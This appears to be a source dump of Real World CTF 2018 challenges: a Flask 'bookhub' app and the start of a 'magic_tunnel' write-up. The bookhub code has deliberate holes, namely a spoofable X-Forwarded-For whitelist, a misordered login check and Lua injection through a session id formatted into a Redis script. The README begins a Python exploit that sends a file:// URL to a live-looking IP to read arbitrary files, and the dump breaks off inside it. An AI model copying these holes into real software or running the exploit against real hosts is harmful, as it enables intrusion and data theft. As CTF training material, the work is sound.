| Session(app) 29 | csrf = CSRFProtect(app) 30 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/commands.py: -------------------------------------------------------------------------------- 1 | import os 2 | import click 3 | import datetime 4 | import getpass 5 | from urllib.parse import urlparse 6 | 7 | from bookhub import app, db 8 | from bookhub.models import User, Book 9 | 10 | 11 | @app.cli.command() 12 | def init(): 13 | pass 14 | 15 | 16 | @app.cli.command() 17 | def createuser(): 18 | username = input('Input username: ') 19 | password = getpass.getpass('Input password: ') 20 | user = User(username=username) 21 | user.set_password(password) 22 | 23 | db.session.add(user) 24 | db.session.commit() 25 | 26 | 27 | @app.cli.command() 28 | def createbook(): 29 | title = input('Input book title: ') 30 | description = input('Input book description: ') 31 | img = input('Input a img url: ') 32 | 33 | book = Book( 34 | title=title, 35 | description=description, 36 | img=img, 37 | created_at=datetime.datetime.now() 38 | ) 39 | db.session.add(book) 40 | db.session.commit() 41 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/forms/__init__.py: -------------------------------------------------------------------------------- 1 | from .user import LoginForm, UserForm 2 | from .book import BookForm 3 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/forms/book.py: -------------------------------------------------------------------------------- 1 | from flask_wtf import FlaskForm 2 | from wtforms import StringField, TextAreaField 3 | from wtforms.validators import DataRequired, StopValidation, URL, Length 4 | 5 | 6 | class BookForm(FlaskForm): 7 | title = StringField('title', validators=[DataRequired(), Length(1, 256)]) 8 | description = TextAreaField('description') 9 | img = StringField('cover', validators=[URL(), Length(1, 256)]) 10 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/forms/user.py: -------------------------------------------------------------------------------- 1 | import os 2 | import flask 3 | from flask_wtf import FlaskForm 4 | from flask_login import current_user 5 | from wtforms import StringField, PasswordField, BooleanField 6 | from wtforms.validators import DataRequired, StopValidation, Length 7 | 8 | from bookhub import app 9 | from bookhub.models import User 10 | from bookhub.helper import ip_address_in, get_remote_addr 11 | 12 | 13 | class LoginForm(FlaskForm): 14 | username = StringField('username', validators=[DataRequired()]) 15 | password = PasswordField('password', validators=[DataRequired()]) 16 | remember_me = BooleanField('remember_me', default=False) 17 | 18 | def validate_password(self, field): 19 | address = get_remote_addr() 20 | whitelist = os.environ.get('WHITELIST_IPADDRESS', '127.0.0.1') 21 | 22 | # If you are in the debug mode or from office network (developer) 23 | if not app.debug and not ip_address_in(address, whitelist): 24 | raise StopValidation(f'your ip address isn\'t in the {whitelist}.') 25 | 26 | user = User.query.filter_by(username=self.username.data).first() 27 | if not user or not user.check_password(field.data): 28 | raise StopValidation('Username or password error.') 29 | 30 | 31 | class UserForm(FlaskForm): 32 | username = StringField('username', validators=[DataRequired(), Length(1, 64)]) 33 | 34 | def 
validate_username(self, field): 35 | if field.data != current_user.username and User.query.filter_by(username=field.data).first(): 36 | raise StopValidation('Username is exists.') 37 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/helper.py: -------------------------------------------------------------------------------- 1 | import flask 2 | import os 3 | import ipaddress 4 | 5 | 6 | def ip_address_in(ip, ip_range): 7 | try: 8 | for item in ip_range.split(','): 9 | if ipaddress.ip_address(ip) in ipaddress.ip_network(item): 10 | return True 11 | except Exception as e: 12 | pass 13 | 14 | return False 15 | 16 | 17 | def get_remote_addr(): 18 | address = flask.request.headers.get('X-Forwarded-For', flask.request.remote_addr) 19 | 20 | try: 21 | ipaddress.ip_address(address) 22 | except ValueError: 23 | return None 24 | else: 25 | return address 26 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/models/__init__.py: -------------------------------------------------------------------------------- 1 | import flask 2 | from bookhub import login_manager, migrate 3 | from .user import User 4 | from .book import Book 5 | 6 | 7 | __all__ = ['User', 'Book'] 8 | 9 | 10 | @login_manager.user_loader 11 | def load_user(user_id): 12 | return User.query.filter_by(id=user_id).first() 13 | 14 | 15 | @login_manager.unauthorized_handler 16 | def unauthorized_handler(): 17 | return flask.redirect(flask.url_for('user.login'), code=303) 18 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/models/book.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | from bookhub import db 3 | 4 | 5 | class Book(db.Model): 6 | id = db.Column(db.Integer, primary_key=True) 7 | title = db.Column(db.String(256), nullable=False) 8 | img = db.Column(db.String(256)) 9 | description = db.Column(db.Text) 10 | 11 | created_at = db.Column(db.DateTime, default=datetime.datetime.now) 12 | 13 | def __repr__(self): 14 | return '' % self.title 15 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/models/user.py: -------------------------------------------------------------------------------- 1 | import os 2 | import flask 3 | from bookhub import db 4 | from werkzeug.security import generate_password_hash, check_password_hash 5 | from bookhub.helper import ip_address_in 6 | 7 | 8 | class User(db.Model): 9 | id = db.Column(db.Integer, primary_key=True) 10 | username = db.Column(db.String(64), unique=True, nullable=False) 11 | password = db.Column(db.String(128)) 12 | 13 | def __repr__(self): 14 | return '' % self.username 15 | 16 | def set_password(self, password): 17 | self.password = generate_password_hash(password) 18 | db.session.commit() 19 | 20 | def check_password(self, password): 21 | return check_password_hash(self.password, password) 22 | 23 | def get_id(self): 24 | return str(self.id) 25 | 26 | @property 27 | def is_active(self): 28 | return True 29 | 30 | @property 31 | def is_anonymous(self): 32 | return False 33 | 34 | @property 35 | def is_authenticated(self): 36 | return True 37 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/static/css/login.css: -------------------------------------------------------------------------------- 1 | #login-box { 2 | max-width:500px; 3 | margin:0 auto; 
4 | margin-top:25px !important; 5 | border-radius:12px; 6 | overflow:hidden; 7 | background:white; 8 | -webkit-box-shadow:0px 6px 30px rgba(0,0,0,0.2); 9 | -moz-box-shadow:0px 6px 30px rgba(0,0,0,0.2); 10 | box-shadow:0px 6px 30px rgba(0,0,0,0.2); 11 | } 12 | 13 | .login-box-header { 14 | background-color:rgb(255,255,255); 15 | text-align:center; 16 | padding-top:18px; 17 | padding-right:25px; 18 | padding-bottom:15px; 19 | padding-left:25px; 20 | } 21 | 22 | .login-box-header { 23 | border:none; 24 | border-bottom:1px solid rgb(224,224,224); 25 | } 26 | 27 | .login-box-header > h4 { 28 | color:rgb(139,139,139); 29 | margin-bottom:0px; 30 | font-weight:400; 31 | font-size:27px; 32 | } 33 | 34 | .login-box-content { 35 | padding:10px 20px; 36 | background-color:#ffffff; 37 | padding-top:20px; 38 | } 39 | 40 | .social-login-link { 41 | text-decoration:none; 42 | color:white; 43 | margin-top:10px; 44 | } 45 | 46 | .fb-login { 47 | background-color:#1a538a; 48 | } 49 | 50 | .gp-login { 51 | background-color:#db4437; 52 | margin-top:10px; 53 | } 54 | 55 | .login-box-content i { 56 | padding:11px 0px 11px 15px; 57 | color:white; 58 | padding-right:20px; 59 | padding-left:20px; 60 | font-size:18px; 61 | } 62 | 63 | .box-shadow { 64 | box-shadow:0 2px 2px 0 rgba(41,48,59,.24), 0 0 2px 0 rgba(41,48,59,.12); 65 | border-radius:5px; 66 | } 67 | 68 | .social-login-link:hover { 69 | text-decoration:none; 70 | color:white; 71 | } 72 | 73 | .login-box-seperator { 74 | flex:1 0 auto; 75 | min-width:1px; 76 | border-top:1px solid #dedfe0; 77 | height:1px; 78 | } 79 | 80 | .name-input { 81 | border-radius:5px; 82 | color:#29303b; 83 | font-size:18px; 84 | height:auto; 85 | padding:11px 10px 12px 40px; 86 | margin-top:10px; 87 | } 88 | 89 | .form-control { 90 | box-shadow:none; 91 | font-size:16px; 92 | padding:10px 12px; 93 | transition:border-color .08s ease-in-out,box-shadow .08s ease-in-out; 94 | } 95 | 96 | .name-login { 97 | padding:10px 20px; 98 | background-color:#ffffff; 99 | } 100 | 101 | #submit-id-submit { 102 | margin-top:0px; 103 | height:46px; 104 | background-color:rgb(26,138,111); 105 | border:0; 106 | color:rgb(255,255,255); 107 | margin-bottom:8px; 108 | padding-top:0px; 109 | padding-bottom:0px; 110 | } 111 | 112 | .submit-row { 113 | padding:10px 20px; 114 | text-align:center; 115 | margin-bottom:8px; 116 | padding-top:0px; 117 | } 118 | 119 | .label-text { 120 | color:#8b8b8b; 121 | } 122 | 123 | #forgot-password-link { 124 | color:#2474c1; 125 | text-decoration:none; 126 | } 127 | 128 | #login-box-footer { 129 | text-align:center; 130 | border-top:1px solid #dedfe0; 131 | padding: 18px 10px 23px 10px; 132 | } 133 | 134 | #register-link { 135 | color:#2474c1; 136 | padding:0px 10px; 137 | text-decoration:none; 138 | } 139 | 140 | #login-box-footer p { 141 | color:#8b8b8b; 142 | margin-bottom:0px; 143 | } 144 | 145 | #submit-id-submit:hover { 146 | background-color:rgb(25,130,105); 147 | } 148 | 149 | .password-input { 150 | margin-top:10px; 151 | } 152 | 153 | #formCheck-1 { 154 | cursor:pointer; 155 | } 156 | 157 | .alert { 158 | word-wrap: break-word; 159 | } -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/_base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | pwnhub_6672 6 | 7 | {% block addstyle %}{% endblock %} 8 | 9 | 10 | {% block body %}{% endblock %} 11 | {% block addscript %}{% endblock %} 12 | 13 | 
-------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/_form.html: -------------------------------------------------------------------------------- 1 | {% macro render(form) -%} 2 | 3 | {%- for field in form -%} 4 | {%- if field.type in ['CSRFTokenField', 'HiddenField'] -%} 5 | {{ field() }} 6 | {%- elif field.is_show and not field.is_show() -%} 7 | {%- else -%} 8 |
9 | 10 | {{ field(class_="form-control") }} 11 | {% if field.errors or field.help_text %} 12 | 13 | {% if field.errors %} 14 | {{ field.errors | first }} 15 | {% else %} 16 | {{ field.help_text }} 17 | {% endif %} 18 | 19 | {%- endif -%} 20 |
21 | {%- endif -%} 22 | {%- endfor -%} 23 | {% endmacro %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/_pagination.html: -------------------------------------------------------------------------------- 1 | {% macro render(pagenav) -%} 2 | 3 | {% if pagenav.total > 0 %} 4 |
    5 | 6 | {%- for page in pagenav.iter_pages() -%} 7 | {% if page %} 8 | {% if page != pagenav.page -%} 9 |
  • {{ page }}
  • 10 | {%- else -%} 11 |
  • {{ page }}
  • 12 | {%- endif %} 13 | {% else -%} 14 |
  • 15 | {%- endif %} 16 | {%- endfor -%} 17 | 18 |
19 | {% endif %} 20 | 21 | {%- endmacro %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/add.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | {% import '_form.html' as f %} 3 | 4 | {% block body %} 5 |
6 |
7 |
8 |

Book Management

9 |
10 |
11 |
12 |
13 |
14 | {{ f.render(form) }} 15 |
16 | 17 | 18 |
19 |
20 |
21 |
22 |
23 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/admin.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | {% import "_pagination.html" as pagation %} 3 | 4 | {% block body %} 5 |
6 |
7 |
8 |
9 |

Book Management

10 |
11 |
12 |
13 |
14 | 16 |
17 |
18 |
19 | 20 |
21 |
22 |
23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | {% for object in object_list.items %} 35 | 36 | 37 | 38 | 39 | 40 | 41 | {% endfor %} 42 | 43 |
Book coverBook titleBook descriptionEdit
{{ object.title }}{{ object.title }}{{ object.description }}Edit
44 |
45 |
46 |
47 |
48 |
49 | 52 |
53 |
54 |
55 |
56 |
57 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/edit.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | {% import '_form.html' as f %} 3 | 4 | {% block body %} 5 |
6 |
7 |
8 |

Book Management

9 |
10 |
11 |
12 |
13 |
14 | {{ f.render(form) }} 15 |
16 | 17 | 18 | 19 |
20 |
21 |
22 |
23 |
24 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/error.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | 3 | {% block body %} 4 |
5 |
6 |
7 |

Error Page

8 |
9 |
10 |
11 |
12 | 18 |
19 |
20 |
21 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | {% import "_pagination.html" as pagation %} 3 | 4 | {% block body %} 5 |
6 |
7 |
8 |
9 |

Bookhub

10 |
11 |
12 |
13 |
14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | {% for object in object_list.items %} 25 | 26 | 27 | 28 | 29 | 30 | {% endfor %} 31 | 32 |
Book coverBook titleBook description
{{ object.title }}{{ object.title }}{{ object.description }}
33 |
34 |
35 |
36 |
37 |
38 | 41 |
42 |
43 |
44 |
45 |
46 | {% endblock %} 47 | 48 | {% block addscript %} 49 | {% if is_debug %} 50 | 51 | 52 | 66 | {% endif %} 67 | 68 | {% endblock %} 69 | 70 | {% block addstyle %} 71 | 72 | {% if is_debug %} 73 | 83 | {% endif %} 84 | 85 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/login.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' -%} 2 | 3 | {% block body %} 4 |
5 | 8 |
9 | {{ form.csrf_token }} 10 | 20 |
21 | 22 |
23 |
24 | 25 |
26 |
27 |
28 |
29 | 34 |
35 | {% endblock %} 36 | 37 | {% block addscript %} 38 | 39 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/templates/system.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | 3 | {% block body %} 4 |
5 |
6 |
7 |

System Management

8 |
9 |
10 |
11 |
12 | 14 |
15 |
16 |
17 |
18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 |
Your username{{ current_user.username }}
Your IP address{{ ip_address }}
Number of users{{ user_count }}
Number of books{{ book_count }}
39 |
40 |
41 | 42 |
43 | 44 |
45 | 46 |
47 |
48 | 49 | 52 |
53 |
54 |
55 | {% endblock %} 56 | 57 | {% block addscript %} 58 | 59 | 102 | {% endblock %} -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/views/__init__.py: -------------------------------------------------------------------------------- 1 | from .user import user_blueprint 2 | from .book import book_blueprint 3 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/views/book.py: -------------------------------------------------------------------------------- 1 | import flask 2 | from flask_login import login_required, login_user, current_user 3 | from bookhub import app, db 4 | from bookhub.forms import BookForm 5 | from bookhub.models import User, Book 6 | 7 | 8 | book_blueprint = flask.Blueprint('book', __name__, template_folder='templates') 9 | 10 | 11 | @book_blueprint.route('/') 12 | def index(): 13 | try: 14 | page = int(flask.request.args.get('page', 1)) 15 | except ValueError: 16 | page = 1 17 | 18 | object_list = Book.query.order_by(Book.created_at.desc()).paginate(page, per_page=10, error_out=False) 19 | object_list.module_name = 'book.index' 20 | return flask.render_template('index.html', object_list=object_list, is_debug=app.debug) 21 | 22 | 23 | @book_blueprint.route('/admin/') 24 | @login_required 25 | def admin(): 26 | try: 27 | page = int(flask.request.args.get('page', 1)) 28 | except ValueError: 29 | page = 1 30 | 31 | object_list = Book.query.order_by(Book.created_at.desc()).paginate(page, per_page=10, error_out=False) 32 | object_list.module_name = 'book.admin' 33 | return flask.render_template('admin.html', object_list=object_list) 34 | 35 | 36 | @book_blueprint.route('/admin/add/', methods=['GET', 'POST']) 37 | @login_required 38 | def add(): 39 | form = BookForm(data=flask.request.data) 40 | if form.validate_on_submit(): 41 | book = Book() 42 | form.populate_obj(book) 43 | db.session.add(book) 44 | db.session.commit() 45 | return flask.redirect(flask.url_for('book.admin')) 46 | 47 | return flask.render_template('add.html', form=form) 48 | 49 | 50 | @book_blueprint.route('/admin/edit//', methods=['GET', 'POST']) 51 | @login_required 52 | def edit(id): 53 | book = Book.query.filter_by(id=id).first_or_404() 54 | form = BookForm(data=flask.request.data, obj=book) 55 | if form.is_submitted() and flask.request.form.get('delete', None) is not None: 56 | db.session.delete(book) 57 | db.session.commit() 58 | return flask.redirect(flask.url_for('book.admin')) 59 | elif form.validate_on_submit(): 60 | form.populate_obj(book) 61 | db.session.commit() 62 | return flask.redirect(flask.url_for('book.admin')) 63 | 64 | return flask.render_template('edit.html', form=form) 65 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/views/user.py: -------------------------------------------------------------------------------- 1 | import flask 2 | import redis 3 | from flask_login import login_required, login_user, current_user, logout_user 4 | from bookhub import app, db, rds 5 | from bookhub.forms import LoginForm, UserForm 6 | from bookhub.models import User, Book 7 | from bookhub.helper import get_remote_addr 8 | 9 | 10 | user_blueprint = flask.Blueprint('user', __name__, template_folder='templates') 11 | 12 | 13 | @user_blueprint.route('/login/', methods=['GET', 'POST']) 14 | def login(): 15 | form = LoginForm(data=flask.request.data) 16 | if form.validate_on_submit(): 17 | user = 
User.query.filter_by(username=form.username.data).first() 18 | login_user(user, remember=form.remember_me.data) 19 | 20 | return flask.redirect(flask.url_for('book.admin')) 21 | 22 | return flask.render_template('login.html', form=form) 23 | 24 | 25 | @user_blueprint.route('/admin/logout/') 26 | @login_required 27 | def logout(): 28 | logout_user() 29 | return flask.redirect(flask.url_for('user.login')) 30 | 31 | 32 | if app.debug: 33 | """ 34 | For CTF administrator, only running in debug mode 35 | """ 36 | 37 | @user_blueprint.route('/admin/system/') 38 | @login_required 39 | def system(): 40 | """ 41 | 42 | 43 | :return: 44 | """ 45 | 46 | ip_address = get_remote_addr() 47 | user_count = User.query.count() 48 | book_count = Book.query.count() 49 | 50 | return flask.render_template('system.html', 51 | ip_address=ip_address, 52 | user_count=user_count, 53 | book_count=book_count 54 | ) 55 | 56 | @user_blueprint.route('/admin/system/change_name/', methods=['POST']) 57 | @login_required 58 | def change_name(): 59 | """ 60 | change username 61 | 62 | :return: json 63 | """ 64 | 65 | user = User.query.get(current_user.id) 66 | form = UserForm(obj=user) 67 | if form.validate_on_submit(): 68 | form.populate_obj(user) 69 | 70 | db.session.commit() 71 | return flask.jsonify(dict(status='success')) 72 | else: 73 | return flask.jsonify(dict(status='fail', errors=form.errors)) 74 | 75 | 76 | @login_required 77 | @user_blueprint.route('/admin/system/refresh_session/', methods=['POST']) 78 | def refresh_session(): 79 | """ 80 | delete all session except the logined user 81 | 82 | :return: json 83 | """ 84 | 85 | status = 'success' 86 | sessionid = flask.session.sid 87 | prefix = app.config['SESSION_KEY_PREFIX'] 88 | 89 | if flask.request.form.get('submit', None) == '1': 90 | try: 91 | rds.eval(rf''' 92 | local function has_value (tab, val) 93 | for index, value in ipairs(tab) do 94 | if value == val then 95 | return true 96 | end 97 | end 98 | 99 | return false 100 | end 101 | 102 | local inputs = {{ "{prefix}{sessionid}" }} 103 | local sessions = redis.call("keys", "{prefix}*") 104 | 105 | for index, sid in ipairs(sessions) do 106 | if not has_value(inputs, sid) then 107 | redis.call("del", sid) 108 | end 109 | end 110 | ''', 0) 111 | except redis.exceptions.ResponseError as e: 112 | app.logger.exception(e) 113 | status = 'fail' 114 | 115 | return flask.jsonify(dict(status=status)) 116 | -------------------------------------------------------------------------------- /2018/bookhub/src/migrations/README: -------------------------------------------------------------------------------- 1 | Generic single-database configuration. -------------------------------------------------------------------------------- /2018/bookhub/src/migrations/alembic.ini: -------------------------------------------------------------------------------- 1 | # A generic, single database configuration. 
2 | 3 | [alembic] 4 | # template used to generate migration files 5 | # file_template = %%(rev)s_%%(slug)s 6 | 7 | # set to 'true' to run the environment during 8 | # the 'revision' command, regardless of autogenerate 9 | # revision_environment = false 10 | 11 | 12 | # Logging configuration 13 | [loggers] 14 | keys = root,sqlalchemy,alembic 15 | 16 | [handlers] 17 | keys = console 18 | 19 | [formatters] 20 | keys = generic 21 | 22 | [logger_root] 23 | level = WARN 24 | handlers = console 25 | qualname = 26 | 27 | [logger_sqlalchemy] 28 | level = WARN 29 | handlers = 30 | qualname = sqlalchemy.engine 31 | 32 | [logger_alembic] 33 | level = INFO 34 | handlers = 35 | qualname = alembic 36 | 37 | [handler_console] 38 | class = StreamHandler 39 | args = (sys.stderr,) 40 | level = NOTSET 41 | formatter = generic 42 | 43 | [formatter_generic] 44 | format = %(levelname)-5.5s [%(name)s] %(message)s 45 | datefmt = %H:%M:%S 46 | -------------------------------------------------------------------------------- /2018/bookhub/src/migrations/env.py: -------------------------------------------------------------------------------- 1 | from __future__ import with_statement 2 | from alembic import context 3 | from sqlalchemy import engine_from_config, pool 4 | from logging.config import fileConfig 5 | import logging 6 | 7 | # this is the Alembic Config object, which provides 8 | # access to the values within the .ini file in use. 9 | config = context.config 10 | 11 | # Interpret the config file for Python logging. 12 | # This line sets up loggers basically. 13 | fileConfig(config.config_file_name) 14 | logger = logging.getLogger('alembic.env') 15 | 16 | # add your model's MetaData object here 17 | # for 'autogenerate' support 18 | # from myapp import mymodel 19 | # target_metadata = mymodel.Base.metadata 20 | from flask import current_app 21 | config.set_main_option('sqlalchemy.url', 22 | current_app.config.get('SQLALCHEMY_DATABASE_URI')) 23 | target_metadata = current_app.extensions['migrate'].db.metadata 24 | 25 | # other values from the config, defined by the needs of env.py, 26 | # can be acquired: 27 | # my_important_option = config.get_main_option("my_important_option") 28 | # ... etc. 29 | 30 | 31 | def run_migrations_offline(): 32 | """Run migrations in 'offline' mode. 33 | 34 | This configures the context with just a URL 35 | and not an Engine, though an Engine is acceptable 36 | here as well. By skipping the Engine creation 37 | we don't even need a DBAPI to be available. 38 | 39 | Calls to context.execute() here emit the given string to the 40 | script output. 41 | 42 | """ 43 | url = config.get_main_option("sqlalchemy.url") 44 | context.configure(url=url) 45 | 46 | with context.begin_transaction(): 47 | context.run_migrations() 48 | 49 | 50 | def run_migrations_online(): 51 | """Run migrations in 'online' mode. 52 | 53 | In this scenario we need to create an Engine 54 | and associate a connection with the context. 
55 | 56 | """ 57 | 58 | # this callback is used to prevent an auto-migration from being generated 59 | # when there are no changes to the schema 60 | # reference: http://alembic.zzzcomputing.com/en/latest/cookbook.html 61 | def process_revision_directives(context, revision, directives): 62 | if getattr(config.cmd_opts, 'autogenerate', False): 63 | script = directives[0] 64 | if script.upgrade_ops.is_empty(): 65 | directives[:] = [] 66 | logger.info('No changes in schema detected.') 67 | 68 | engine = engine_from_config(config.get_section(config.config_ini_section), 69 | prefix='sqlalchemy.', 70 | poolclass=pool.NullPool) 71 | 72 | connection = engine.connect() 73 | context.configure(connection=connection, 74 | target_metadata=target_metadata, 75 | process_revision_directives=process_revision_directives, 76 | render_as_batch=True, 77 | **current_app.extensions['migrate'].configure_args) 78 | 79 | try: 80 | with context.begin_transaction(): 81 | context.run_migrations() 82 | finally: 83 | connection.close() 84 | 85 | if context.is_offline_mode(): 86 | run_migrations_offline() 87 | else: 88 | run_migrations_online() 89 | -------------------------------------------------------------------------------- /2018/bookhub/src/migrations/script.py.mako: -------------------------------------------------------------------------------- 1 | """${message} 2 | 3 | Revision ID: ${up_revision} 4 | Revises: ${down_revision | comma,n} 5 | Create Date: ${create_date} 6 | 7 | """ 8 | from alembic import op 9 | import sqlalchemy as sa 10 | ${imports if imports else ""} 11 | 12 | # revision identifiers, used by Alembic. 13 | revision = ${repr(up_revision)} 14 | down_revision = ${repr(down_revision)} 15 | branch_labels = ${repr(branch_labels)} 16 | depends_on = ${repr(depends_on)} 17 | 18 | 19 | def upgrade(): 20 | ${upgrades if upgrades else "pass"} 21 | 22 | 23 | def downgrade(): 24 | ${downgrades if downgrades else "pass"} 25 | -------------------------------------------------------------------------------- /2018/bookhub/src/migrations/versions/b6eb51473869_.py: -------------------------------------------------------------------------------- 1 | """empty message 2 | 3 | Revision ID: b6eb51473869 4 | Revises: 5 | Create Date: 2018-07-17 19:05:22.506093 6 | 7 | """ 8 | from alembic import op 9 | import sqlalchemy as sa 10 | 11 | 12 | # revision identifiers, used by Alembic. 13 | revision = 'b6eb51473869' 14 | down_revision = None 15 | branch_labels = None 16 | depends_on = None 17 | 18 | 19 | def upgrade(): 20 | # ### commands auto generated by Alembic - please adjust! ### 21 | op.create_table('user', 22 | sa.Column('id', sa.Integer(), nullable=False), 23 | sa.Column('username', sa.String(length=64), nullable=True), 24 | sa.Column('password', sa.String(length=128), nullable=True), 25 | sa.PrimaryKeyConstraint('id'), 26 | sa.UniqueConstraint('username') 27 | ) 28 | # ### end Alembic commands ### 29 | 30 | 31 | def downgrade(): 32 | # ### commands auto generated by Alembic - please adjust! ### 33 | op.drop_table('user') 34 | # ### end Alembic commands ### 35 | -------------------------------------------------------------------------------- /2018/bookhub/src/migrations/versions/bd31dc4168e1_.py: -------------------------------------------------------------------------------- 1 | """empty message 2 | 3 | Revision ID: bd31dc4168e1 4 | Revises: b6eb51473869 5 | Create Date: 2018-07-22 19:11:40.172217 6 | 7 | """ 8 | from alembic import op 9 | import sqlalchemy as sa 10 | 11 | 12 | # revision identifiers, used by Alembic. 
13 | revision = 'bd31dc4168e1' 14 | down_revision = 'b6eb51473869' 15 | branch_labels = None 16 | depends_on = None 17 | 18 | 19 | data = [ 20 | { 21 | 'title': 'Gone with the Wind', 22 | 'description': "Gone with the Wind is a novel by American writer Margaret Mitchell, first published in 1936. ", 23 | 'img': 'https://wx3.sinaimg.cn/large/400f4ee7ly1ftiyq96oumj205107r41l.jpg' 24 | }, 25 | { 26 | 'title': 'On the road', 27 | 'description': 'On the Road is a novel by American writer Jack Kerouac, based on the travels of' 28 | ' Kerouac and his friends across the United States.', 29 | 'img': 'https://ws1.sinaimg.cn/large/400f4ee7ly1ftiyvcdh1nj206y0arac9.jpg' 30 | }, 31 | { 32 | 'title': 'The Great Gatsby', 33 | 'description': 'The Great Gatsby is a 1925 novel written by American author F. Scott Fitzgerald' 34 | ' that follows a cast of characters living in the fictional town of West and East' 35 | ' Egg on prosperous Long Island in the summer of 1922.', 36 | 'img': 'https://ws4.sinaimg.cn/large/400f4ee7ly1ftiz2xuq7fj20940dv10z.jpg' 37 | } 38 | ] 39 | 40 | 41 | def upgrade(): 42 | # ### commands auto generated by Alembic - please adjust! ### 43 | book_table = op.create_table('book', 44 | sa.Column('id', sa.Integer(), nullable=False), 45 | sa.Column('title', sa.String(length=256), nullable=False), 46 | sa.Column('img', sa.String(length=256), nullable=True), 47 | sa.Column('description', sa.Text(), nullable=True), 48 | sa.Column('created_at', sa.DateTime(), nullable=True), 49 | sa.PrimaryKeyConstraint('id') 50 | ) 51 | with op.batch_alter_table('user', schema=None) as batch_op: 52 | batch_op.alter_column('username', 53 | existing_type=sa.VARCHAR(length=64), 54 | nullable=False) 55 | 56 | op.bulk_insert(book_table, data) 57 | 58 | # ### end Alembic commands ### 59 | 60 | 61 | def downgrade(): 62 | # ### commands auto generated by Alembic - please adjust! 
### 63 | with op.batch_alter_table('user', schema=None) as batch_op: 64 | batch_op.alter_column('username', 65 | existing_type=sa.VARCHAR(length=64), 66 | nullable=True) 67 | 68 | op.drop_table('book') 69 | # ### end Alembic commands ### 70 | -------------------------------------------------------------------------------- /2018/bookhub/src/requirements.txt: -------------------------------------------------------------------------------- 1 | flask 2 | flask-sqlalchemy 3 | flask-migrate 4 | flask-wtf 5 | python-dotenv 6 | flask-login 7 | flask-session 8 | redis 9 | gunicorn 10 | gevent -------------------------------------------------------------------------------- /2018/magic_tunnel/.dockerignore: -------------------------------------------------------------------------------- 1 | code/rwctf/media/ 2 | code/rwctf/db.sqlite3 3 | code/.idea/ -------------------------------------------------------------------------------- /2018/magic_tunnel/.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | __pycache__ 3 | /.idea/ 4 | db.sqlite3 -------------------------------------------------------------------------------- /2018/magic_tunnel/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.7-alpine 2 | 3 | LABEL maintainer="phith0n " 4 | 5 | ADD requirements.txt /tmp/requirements.txt 6 | ADD flag/readflag.c /tmp/readflag.c 7 | ENV PYCURL_SSL_LIBRARY=openssl 8 | 9 | RUN set -ex \ 10 | # && sed -i 's/dl-cdn.alpinelinux.org/mirrors.aliyun.com/g' /etc/apk/repositories \ 11 | && apk add --no-cache libcurl postgresql-dev 12 | 13 | RUN set -ex \ 14 | && apk add --no-cache --virtual .build-deps build-base curl-dev linux-headers \ 15 | # && pip install -i https://mirrors.aliyun.com/pypi/simple -r /tmp/requirements.txt \ 16 | && pip install -r /tmp/requirements.txt \ 17 | && gcc /tmp/readflag.c -o /readflag \ 18 | && apk del --no-cache --purge .build-deps \ 19 | && rm -rf /var/cache/apk/* /tmp/* 20 | 21 | COPY ./code/ /usr/src/ 22 | WORKDIR /usr/src/rwctf 23 | 24 | COPY flag/flag /flag 25 | RUN set -ex \ 26 | && chown root:root -R . \ 27 | && chown root:root /flag \ 28 | && chmod 0600 /flag \ 29 | && chmod u+s /readflag 30 | 31 | CMD ["sh", "server.sh"] 32 | -------------------------------------------------------------------------------- /2018/magic_tunnel/README.md: -------------------------------------------------------------------------------- 1 | # Real World CTF 2018 Quals - Magic Tunnel 2 | 3 | This is my second challenge for the Real World CTF 2018. 4 | 5 | Read arbitrary files: 6 | 7 | ```python 8 | import re 9 | import requests 10 | 11 | 12 | s = requests.session() 13 | 14 | response = s.post('http://117.51.155.71:8080/', data={ 15 | 'url': 'file:///usr/src/rwctf/manage.py', 16 | 'csrfmiddlewaretoken': 'HrBo1jyAca5ICUYez55WYYB11f34QeBRwOi4mQb2MHBLtqHFfyjSXgE3qzLnxkLR' 17 | }, cookies={'csrftoken': 'HrBo1jyAca5ICUYez55WYYB11f34QeBRwOi4mQb2MHBLtqHFfyjSXgE3qzLnxkLR'}, 